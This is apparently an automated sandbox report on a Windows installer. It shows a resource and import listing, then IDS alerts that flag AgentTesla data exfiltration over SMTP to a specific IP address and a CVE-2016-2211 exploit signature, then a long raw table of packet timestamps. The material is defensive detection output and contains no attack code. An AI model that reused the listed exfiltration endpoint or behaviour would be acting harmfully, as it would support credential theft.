                                                                                            RT_ICON0x83d400x600Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishUnited States0.4986979166666667
                                                                                            RT_DIALOG0x843400x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x844400x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x845600xc4dataEnglishUnited States0.5918367346938775
                                                                                            RT_DIALOG0x846280x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x846880x84dataEnglishUnited States0.8484848484848485
                                                                                            RT_MANIFEST0x847100x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                                                                            DLLImport
                                                                                            KERNEL32.dllExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                                                            USER32.dllGetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                                                            GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                            SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                                                            ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                                            COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                                            ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-11-05T16:36:10.560898+01002030171ET MALWARE AgentTesla Exfil Via SMTP1192.168.2.849714208.91.199.223587TCP
                                                                                            2024-11-05T16:36:10.560898+01002840032ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M21192.168.2.849714208.91.199.223587TCP
                                                                                            2024-11-05T16:36:34.240688+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.849705TCP
                                                                                            2024-11-05T16:37:01.980691+01002855245ETPRO MALWARE Agent Tesla Exfil via SMTP1192.168.2.849714208.91.199.223587TCP
                                                                                            2024-11-05T16:37:01.980691+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.849714208.91.199.223587TCP
                                                                                            2024-11-05T16:37:12.483432+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.849715TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Nov 5, 2024 16:36:49.997534990 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:49.997560978 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:49.997643948 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:50.037348032 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:50.037364006 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:50.886822939 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:50.886924028 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:50.887685061 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:50.887742996 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:50.973699093 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:50.973746061 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:50.974114895 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:50.974165916 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:50.977139950 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:51.023329020 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:51.344122887 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:51.344194889 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:51.344542980 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:51.344592094 CET44349710142.250.185.238192.168.2.8
                                                                                            Nov 5, 2024 16:36:51.344650030 CET49710443192.168.2.8142.250.185.238
                                                                                            Nov 5, 2024 16:36:51.370865107 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:51.370912075 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:51.370989084 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:51.371272087 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:51.371290922 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:52.252598047 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:52.252717018 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:52.257026911 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:52.257041931 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:52.257379055 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:52.257460117 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:52.257848024 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:52.303343058 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.280328989 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.280400991 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.288798094 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.288880110 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.402148008 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.402225018 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.402247906 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.402261019 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.402306080 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.402306080 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.402316093 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.402370930 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.402525902 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.402575016 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.402617931 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.402667999 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.404263973 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.404356003 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.404360056 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.404405117 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.413361073 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.413449049 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.413466930 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.413526058 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.423808098 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.423927069 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.423934937 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.424021006 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.430644035 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.430717945 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.430722952 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.430754900 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.439357042 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.439456940 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.439462900 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.439511061 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.448232889 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.448295116 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.448317051 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.448364019 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.458154917 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.458256960 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.458262920 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.458319902 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.523801088 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.523873091 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.523911953 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.523917913 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.523917913 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.523936987 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.523950100 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.524017096 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.524230003 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.524283886 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.524288893 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.524365902 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.524410963 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.524477959 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.524482012 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.524529934 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.525075912 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.525140047 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.525144100 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.525177002 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.525193930 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.525198936 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.525228024 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.525269985 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.525978088 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.526041985 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.526048899 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.526091099 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.526096106 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.526130915 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.526143074 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.526181936 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.534859896 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.534936905 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.534940004 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.534954071 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.534976959 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.535002947 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.535022020 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.535026073 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.535042048 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.535098076 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.543796062 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.543853998 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.543859959 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.543955088 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.546597958 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.546664000 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.546669006 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.546701908 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.552650928 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.552707911 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.552937031 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.552975893 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.557921886 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.558052063 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.558058023 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.558129072 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.563261032 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.563303947 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.563311100 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.563359976 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.569148064 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.569216967 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.569221973 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.569257975 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.575541973 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.575598955 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.575603008 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.575642109 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.580481052 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.580545902 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.580550909 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.580604076 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.585913897 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.586021900 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.586028099 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.586070061 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.591944933 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.592159033 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.592165947 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.592272043 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646522045 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646601915 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646609068 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646645069 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646652937 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646656990 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646686077 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646694899 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646713972 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646718025 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646733999 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646765947 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646773100 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646786928 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646805048 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646836996 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646841049 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646872044 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646894932 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646898985 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646918058 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646945953 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.646950006 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.646989107 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.647243023 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.647284985 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.647298098 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.647330046 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.647336006 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.647368908 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.647391081 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.647445917 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.647449970 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.647536993 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.649173021 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.649218082 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.649255037 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.649260998 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.649293900 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.649293900 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.651063919 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.651189089 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.651195049 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.651242018 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.654057980 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.654156923 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.655709028 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.655765057 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.656903028 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.656958103 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.657004118 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.657073021 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.661907911 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.661956072 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.661961079 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.662076950 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.665666103 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.665725946 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.665730953 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.665795088 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.665798903 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.665827990 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.665832043 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.665865898 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.668840885 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.668890953 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.668895960 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.669059992 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.671617031 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.671770096 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.671773911 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.671812057 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.674392939 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.674458981 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.674495935 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.674539089 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.677299976 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.677385092 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.677390099 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.677448988 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.679955959 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.680038929 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.680155993 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.680193901 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.682838917 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.682920933 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.682926893 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.682981014 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.685657978 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.685712099 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.685715914 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.685806036 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.690140963 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.690227985 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.690272093 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.690310001 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.691231012 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.691273928 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.691278934 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.691332102 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.694216013 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.694272995 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.694278002 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.694315910 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.696461916 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.696523905 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.696527958 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.696578979 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.699088097 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.699146032 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.699151993 CET44349711216.58.206.65192.168.2.8
                                                                                            Nov 5, 2024 16:36:55.699234009 CET49711443192.168.2.8216.58.206.65
                                                                                            Nov 5, 2024 16:36:55.701945066 CET44349711216.58.206.65192.168.2.8
